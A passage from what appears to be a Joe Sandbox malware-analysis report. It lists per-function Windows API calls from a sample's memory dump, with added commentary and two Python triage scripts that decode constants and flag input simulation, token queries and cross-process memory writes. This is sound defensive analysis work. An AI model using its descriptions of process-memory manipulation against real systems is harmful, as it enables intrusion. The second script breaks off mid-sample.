                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 002C8D58
                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 002C8D5F
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 002C8D75
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 5169496984f2102d6b5c096821080db73d64a2f8811b05a2c5dc41229dbf223e
                                                                            • Instruction ID: acb0c94a875d22e5d674ced287b8365b02a17492c4ea2d54c5a42a38c7e0fd0d
                                                                            • Opcode Fuzzy Hash: 5169496984f2102d6b5c096821080db73d64a2f8811b05a2c5dc41229dbf223e
                                                                            • Instruction Fuzzy Hash: F3F0AF34211205AFEB160FB4EC98F6B3BACEF49B54F04421AF946C2190CB609D10DB60
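The "APIs" entries above are easier to triage once the raw constants are decoded and each function is tagged by the API combination it uses: the PostMessageW pair with 0x201/0x202 is a synthetic WM_LBUTTONDOWN/WM_LBUTTONUP click, GetDC plus GetPixel is a screen pixel read, GetTokenInformation called twice around a HeapAlloc is the size-probe-then-query pattern, and QueryPerformanceCounter around Sleep is a timed sleep. The decoder below is an added example, not code from the report or from Joe Sandbox. It parses a constructed sample in the shape of the entries on this page (a few lines copied from four of the functions, not the full export) and names constants from their numeric value rather than from any annotation the sandbox printed, so a TOKEN_INFORMATION_CLASS value of 3 is rendered as TokenPrivileges. The WM_, Token and GWL_ tables are standard Win32 values; treating the 0xEB/0xEC/0xF0 GetWindowLongW indexes as the low byte of the negative GWL_* constants is an assumption about how the report prints them.

```python
"""Decode Joe Sandbox 'APIs' function entries into readable Win32 calls and behaviour tags."""
import re
from dataclasses import dataclass

# Constructed input in the shape of the report entries (a handful of lines from four
# functions). Annotations such as "(TokenIntegrityLevel)" are kept exactly as the sandbox
# printed them; the decoder names constants from the numeric value instead.
SAMPLE = """\
APIs
• GetWindowRect.USER32(?,?), ref: 002C95E8
• PostMessageW.USER32(?,00000201,00000001), ref: 002C9692
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002C969A
• PostMessageW.USER32(?,00000202,00000000), ref: 002C96A8
Memory Dump Source
APIs
• IsWindow.USER32(00000000), ref: 002E6159
• GetForegroundWindow.USER32 ref: 002E6170
• GetDC.USER32(00000000), ref: 002E61AC
• GetPixel.GDI32(00000000,?,00000003), ref: 002E61B8
• ReleaseDC.USER32(00000000,00000003), ref: 002E61F3
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002C8D3F
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D49
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D5F
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D75
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?), ref: 002D581B
• QueryPerformanceFrequency.KERNEL32(?,?,?,?), ref: 002D5829
• Sleep.KERNEL32(00000000,?,?,?), ref: 002D5831
• QueryPerformanceCounter.KERNEL32(?,?,?,?), ref: 002D583B
"""

CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
ARG_RE = re.compile(r"([0-9A-Fa-f]{8})(?:\(\w+\))?")  # "00000003" or "00000003(Annotation)"

# Standard Win32 constants, keyed by (API, argument position).
WM_MESSAGES = {0x201: "WM_LBUTTONDOWN", 0x202: "WM_LBUTTONUP", 0x204: "WM_RBUTTONDOWN", 0x205: "WM_RBUTTONUP"}
TOKEN_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges", 18: "TokenElevationType",
               20: "TokenElevation", 25: "TokenIntegrityLevel"}
GWL_INDEX = {0xEB: "GWL_ID", 0xEC: "GWL_EXSTYLE", 0xF0: "GWL_STYLE", 0xFC: "GWL_WNDPROC"}
SYMBOLIC_ARGS = {("PostMessageW", 1): WM_MESSAGES, ("GetTokenInformation", 1): TOKEN_CLASS,
                 ("GetWindowLongW", 1): GWL_INDEX, ("SetWindowLongW", 1): GWL_INDEX}


@dataclass
class Call:
    api: str
    module: str
    args: list  # int for hex values, None for '?', str for sandbox annotations
    ref: str


def parse_arg(token):
    token = token.strip()
    if token == "?":
        return None
    m = ARG_RE.fullmatch(token)
    return int(m.group(1), 16) if m else token


def parse_entries(text):
    """Split the report text at each 'APIs' header; return one list of Calls per function."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            entries.append([])
        elif entries and (m := CALL_RE.match(line)):
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
            entries[-1].append(Call(m["api"], m["mod"], args, m["ref"]))
    return entries


def decode(call):
    """Render a call with known numeric constants replaced by their Win32 names."""
    out = []
    for i, a in enumerate(call.args):
        if a is None:
            out.append("?")
        elif isinstance(a, int):
            table = SYMBOLIC_ARGS.get((call.api, i), {})
            # Assumption: GWL_* indexes are negative and the report prints only the low byte.
            key = a & 0xFF if table is GWL_INDEX else a
            out.append(table.get(key, f"0x{a:X}"))
        else:
            out.append(a)
    return f"{call.api}({', '.join(out)})"


def tag_entry(calls):
    """Behaviour tags for one function, derived from which APIs it combines."""
    apis = [c.api for c in calls]
    tags = set()
    msgs = {c.args[1] for c in calls if c.api == "PostMessageW" and len(c.args) > 1}
    if {0x201, 0x202} <= msgs:
        tags.add("synthetic-left-click")  # click delivered by message, not by the user
    if "GetDC" in apis and "GetPixel" in apis:
        tags.add("screen-pixel-read")
    classes = {c.args[1] for c in calls if c.api == "GetTokenInformation" and len(c.args) > 1}
    if apis.count("GetTokenInformation") >= 2 and "HeapAlloc" in apis:
        tags.add("token-query-two-call")  # size probe, allocate, query again
    if 25 in classes:
        tags.add("integrity-level-check")
    if "QueryPerformanceCounter" in apis and "Sleep" in apis:
        tags.add("timed-sleep")  # sleep measured against a high-resolution clock
    return tags


def analyze(text):
    return [{"ref": calls[0].ref if calls else None,
             "calls": [decode(c) for c in calls],
             "tags": sorted(tag_entry(calls))} for calls in parse_entries(text)]


if __name__ == "__main__":
    for entry in analyze(SAMPLE):
        print(entry["ref"], entry["tags"])
        for rendered in entry["calls"]:
            print("   ", rendered)
```

Run it on a saved copy of the report and the tag column gives a first-pass map of which functions simulate input, read the screen, inspect the process token or measure time; functions that fall under no tag are left for manual review. Empty entries such as the `_memcmp` one above parse as a function with no calls and no tags.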
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 002CCD90
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 002CCDA7
                                                                            • MessageBeep.USER32(00000000), ref: 002CCDBF
                                                                            • KillTimer.USER32(?,0000040A), ref: 002CCDDB
                                                                            • EndDialog.USER32(?,00000001), ref: 002CCDF5
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: a2c9b779fa186f3781332db394e22d133ec9acf9f654a43dc6baff9d3d58de76
                                                                            • Instruction ID: 89e2c0b663787221c7a6f1f801de7e178d49458f4d3d5d8bbd9ad472cb53aa24
                                                                            • Opcode Fuzzy Hash: a2c9b779fa186f3781332db394e22d133ec9acf9f654a43dc6baff9d3d58de76
                                                                            • Instruction Fuzzy Hash: 9601A230511708ABEB265F24DD5EFA67B7CFB00701F04076EE587A10E1DBE1A9648B80
                                                                            APIs
                                                                            • EndPath.GDI32(?), ref: 0027179B
                                                                            • StrokeAndFillPath.GDI32(?,?,002ABBC9,00000000,?), ref: 002717B7
                                                                            • SelectObject.GDI32(?,00000000), ref: 002717CA
                                                                            • DeleteObject.GDI32 ref: 002717DD
                                                                            • StrokePath.GDI32(?), ref: 002717F8
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: f167b84e19cf9fdf5bf44e56b4843ab65b3a927336910ca4f80b3b1579167988
                                                                            • Instruction ID: 7b53f822e4d6b9a687c737356d47a7200a1b844c8fdc6e4c0ed40735c8015d98
                                                                            • Opcode Fuzzy Hash: f167b84e19cf9fdf5bf44e56b4843ab65b3a927336910ca4f80b3b1579167988
                                                                            • Instruction Fuzzy Hash: 55F01970019209ABDB3B5F29EC8DB587BACAB01322F04C215F52D481F0C73089A6DF10
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 002DCA75
                                                                            • CoCreateInstance.OLE32(00303D3C,00000000,00000001,00303BAC,?), ref: 002DCA8D
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            • CoUninitialize.OLE32 ref: 002DCCFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                            • String ID: .lnk
                                                                            • API String ID: 2683427295-24824748
                                                                            • Opcode ID: 9bc6155d7645f7c54b358c36dfaeb21b3a2b8da8b46d3cdc8f72a4987429864c
                                                                            • Instruction ID: 076bb021684b92f05239042064575e52e9d182d46f630b2249155977e3ea8a55
                                                                            • Opcode Fuzzy Hash: 9bc6155d7645f7c54b358c36dfaeb21b3a2b8da8b46d3cdc8f72a4987429864c
                                                                            • Instruction Fuzzy Hash: 8CA14B71114205AFD304EF64D891EABB7ECEF94704F00891DF15997292EB70EA19CF92
                                                                            APIs
                                                                              • Part of subcall function 00290FE6: std::exception::exception.LIBCMT ref: 0029101C
                                                                              • Part of subcall function 00290FE6: __CxxThrowException@8.LIBCMT ref: 00291031
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 00281680: _memmove.LIBCMT ref: 002816DB
                                                                            • __swprintf.LIBCMT ref: 0027E598
                                                                            Strings
                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0027E431
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                            • API String ID: 1943609520-557222456
                                                                            • Opcode ID: bde3c260924315a993332bc99a92100f41b6ed20eb08a8d0451a774fbcc1ad0e
                                                                            • Instruction ID: 298ca5089b3809b40d9a66d41b8fdf5add25e8d530e12216982912482a4cdf41
                                                                            • Opcode Fuzzy Hash: bde3c260924315a993332bc99a92100f41b6ed20eb08a8d0451a774fbcc1ad0e
                                                                            • Instruction Fuzzy Hash: AC91AE751242119FCB14FF24C895C6EB7A8EF99304F40491DF4859B2E1EA30ED65CFA2
                                                                            APIs
                                                                            • __startOneArgErrorHandling.LIBCMT ref: 002952CD
                                                                              • Part of subcall function 002A0320: __87except.LIBCMT ref: 002A035B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorHandling__87except__start
                                                                            • String ID: pow
                                                                            • API String ID: 2905807303-2276729525
                                                                            • Opcode ID: ddd830f5225370e9abe65456f5a359dac4cb26ae1f56e4c28a8e84e77b1c6cb2
                                                                            • Instruction ID: 0ce3bbb2a38b8091bacd13699e2f0ffd09f349f23e304adcec2f9c0c4056f789
                                                                            • Opcode Fuzzy Hash: ddd830f5225370e9abe65456f5a359dac4cb26ae1f56e4c28a8e84e77b1c6cb2
                                                                            • Instruction Fuzzy Hash: 6F515E21F3AA0387CF17BF24C99137A6794AB42750F204D99E4C1451A5EF748CF89B46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$+
                                                                            • API String ID: 0-2552117581
                                                                            • Opcode ID: 2399034b15a2e53f32637e42a6c7f1ac81c708270ab2467d867e77d25d235b10
                                                                            • Instruction ID: e5f14eacc1b3dfb99c54f8a05df2f650cc050924e6d7846f449436edb198ee87
                                                                            • Opcode Fuzzy Hash: 2399034b15a2e53f32637e42a6c7f1ac81c708270ab2467d867e77d25d235b10
                                                                            • Instruction Fuzzy Hash: FF51237552025ACFDF15EF68C488AFABBA4EF55320F140259F8819B2D0D734AC66CB61
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_free
                                                                            • String ID: #V(
                                                                            • API String ID: 2620147621-471757699
                                                                            • Opcode ID: 71d8fd1cf800d2aacfb9a7fb1206272bfca31d178b92821982125b7564db0f49
                                                                            • Instruction ID: fc94ce37ebd27b1fe22e857ccb90b32c8f3545e1cfebfdabba03db06294852aa
                                                                            • Opcode Fuzzy Hash: 71d8fd1cf800d2aacfb9a7fb1206272bfca31d178b92821982125b7564db0f49
                                                                            • Instruction Fuzzy Hash: 61516C716247428FDB24CF28C481B6FBBE5BF89354F05896DE48987250E731E821CB92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$_memmove
                                                                            • String ID: ERCP
                                                                            • API String ID: 2532777613-1384759551
                                                                            • Opcode ID: a67530463e22d8d740990348a11bd6707e02eb1e4a7f5d566845ab6534609d64
                                                                            • Instruction ID: 5d46feef17fab57ee1165e123036a3772a20213c1f15a525a54695043100ab43
                                                                            • Opcode Fuzzy Hash: a67530463e22d8d740990348a11bd6707e02eb1e4a7f5d566845ab6534609d64
                                                                            • Instruction Fuzzy Hash: 7E51F87592130A9FDB24DF64C881BAABBF8EF04310F24856EE54ACB2C1E770D5A5CB50
                                                                            APIs
                                                                              • Part of subcall function 002D1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002C9E4E,?,?,00000034,00000800,?,00000034), ref: 002D1CE5
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002CA3F7
                                                                              • Part of subcall function 002D1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002C9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 002D1CB0
                                                                              • Part of subcall function 002D1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 002D1C08
                                                                              • Part of subcall function 002D1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002C9E12,00000034,?,?,00001004,00000000,00000000), ref: 002D1C18
                                                                              • Part of subcall function 002D1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002C9E12,00000034,?,?,00001004,00000000,00000000), ref: 002D1C2E
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002CA464
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002CA4B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            • Opcode ID: 993ce845054cc6aac15b634fa97031b84cd2860677b62181a1c74b11533c64c4
                                                                            • Instruction ID: aa3bcc402d8cf9e23217fb6d164ac06094870994a79cfa0662cc6f740ceba4f3
                                                                            • Opcode Fuzzy Hash: 993ce845054cc6aac15b634fa97031b84cd2860677b62181a1c74b11533c64c4
                                                                            • Instruction Fuzzy Hash: 57413A7291121CBFDB24DFA4C985FDEB7B8EB45300F00419AFA45A7280DA716E65CBA1
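The entry above reaches OpenProcess, VirtualAllocEx, WriteProcessMemory and ReadProcessMemory through its subcalls, wrapped around SendMessageW calls. The recorded argument values decode against the public headers: the SendMessageW message numbers 0x1104 and 0x1111 are TVM_GETITEMRECT and TVM_HITTEST (TV_FIRST = 0x1100), the ReadProcessMemory subcall's argument list carries 0x1073 (LVM_GETITEMTEXTW) and 0x1004 (LVM_GETITEMCOUNT) (LVM_FIRST = 0x1000), and the OpenProcess desired-access value 0x438 is PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, without PROCESS_CREATE_THREAD. That is the standard way to read item data out of a list-view or tree-view control that belongs to another process: the control dereferences the pointers in the message in its own address space, so the caller has to allocate the item structure in the target, write it, send the message and read the answer back. It will fire a foreign-memory-write signature, but it is a different mechanism from mapping a PE image into the target and starting a thread there, so the two findings should be checked separately against the individual functions. The script below is an added triage helper, not part of this report or of Joe Sandbox's tooling. It parses the text form of these function entries, decodes the message and access constants listed above (only those four message values are in its table) and lists the entries that reach the cross-process memory APIs. The embedded sample is constructed from two of this page's entries, abridged.

```python
"""Triage helper for a Joe Sandbox per-function listing (added example, not
part of the report or of Joe Sandbox's tooling). It parses the text form of
the function entries on this page, decodes the window-message and process
access constants found in call arguments, and flags the entries that reach
another process's memory."""
import re
from dataclasses import dataclass, field

# commctrl.h message values seen in this report (LVM_FIRST 0x1000, TV_FIRST 0x1100)
MSG_NAMES = {0x1004: "LVM_GETITEMCOUNT", 0x1073: "LVM_GETITEMTEXTW",
             0x1104: "TVM_GETITEMRECT", 0x1111: "TVM_HITTEST"}
# winnt.h process access rights relevant to this triage
PROCESS_ACCESS = {0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
                  0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                  0x0400: "PROCESS_QUERY_INFORMATION"}
FOREIGN_MEMORY_APIS = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"}
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(args), ref: ..." with an optional "Part of subcall function X:" prefix
API_LINE = re.compile(r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?([\w:@]+)\.([A-Z0-9_]+)(?:\(([^)]*)\))?")
ID_LINE = re.compile(r"•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID):\s*(.*)")


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)   # (name, module, [args]) in listed order
    ids: dict = field(default_factory=dict)    # "Opcode ID" -> value, etc.


def _hex(tok):
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok or "") else None


def decode_message(args):
    """Name of the window message (2nd argument) in a SendMessageW argument list."""
    msg = _hex(args[1]) if len(args) > 1 else None
    return "?" if msg is None else MSG_NAMES.get(msg, f"0x{msg:04X}")


def decode_process_access(mask):
    """Known access-right names set in an OpenProcess desired-access mask."""
    return [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]


def parse_entries(text):
    """One FunctionEntry per function; an entry ends at its Instruction Fuzzy Hash line."""
    entries, cur, section = [], FunctionEntry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        elif section == "APIs" and (m := API_LINE.search(line)):
            args = [a.strip() for a in (m.group(3) or "").split(",") if a.strip()]
            cur.apis.append((m.group(1), m.group(2), args))
        elif section == "Similarity":
            if m := ID_LINE.search(line):
                cur.ids[m.group(1)] = m.group(2).strip()
            if line.startswith("• Instruction Fuzzy Hash"):
                entries.append(cur)
                cur, section = FunctionEntry(), None
    return entries


def messages_sent(entry):
    return [decode_message(a) for n, _, a in entry.apis if n == "SendMessageW"]


def foreign_memory_apis(entry):
    """Subset of FOREIGN_MEMORY_APIS the function reaches, directly or through subcalls."""
    return sorted({n for n, _, _ in entry.apis} & FOREIGN_MEMORY_APIS)


def triage(text):
    """Entries that touch another process's memory, with the decoded call context."""
    out = []
    for e in parse_entries(text):
        if hit := foreign_memory_apis(e):
            access = [decode_process_access(_hex(a[0]) or 0)
                      for n, _, a in e.apis if n == "OpenProcess" and a]
            out.append({"opcode_id": e.ids.get("Opcode ID", "")[:16], "apis": hit,
                        "messages": messages_sent(e), "open_process_access": access})
    return out


# Constructed sample: two entries copied from this page, abridged (Associated lines dropped).
SAMPLE = """
APIs
• EndPath.GDI32(?), ref: 0027179B
• StrokeAndFillPath.GDI32(?,?,002ABBC9,00000000,?), ref: 002717B7
• DeleteObject.GDI32 ref: 002717DD
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: f167b84e19cf9fdf5bf44e56b4843ab65b3a927336910ca4f80b3b1579167988
• Instruction Fuzzy Hash: 55F01970019209ABDB3B5F29EC8DB587BACAB01322F04C215F52D481F0C73089A6DF10
APIs
  • Part of subcall function 002D1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002C9E4E,?,?,00000034,00000800,?,00000034), ref: 002D1CE5
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002CA3F7
  • Part of subcall function 002D1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002C9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 002D1CB0
  • Part of subcall function 002D1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 002D1C08
  • Part of subcall function 002D1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002C9E12,00000034,?,?,00001004,00000000,00000000), ref: 002D1C18
  • Part of subcall function 002D1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002C9E12,00000034,?,?,00001004,00000000,00000000), ref: 002D1C2E
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002CA464
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002CA4B1
Strings
Memory Dump Source
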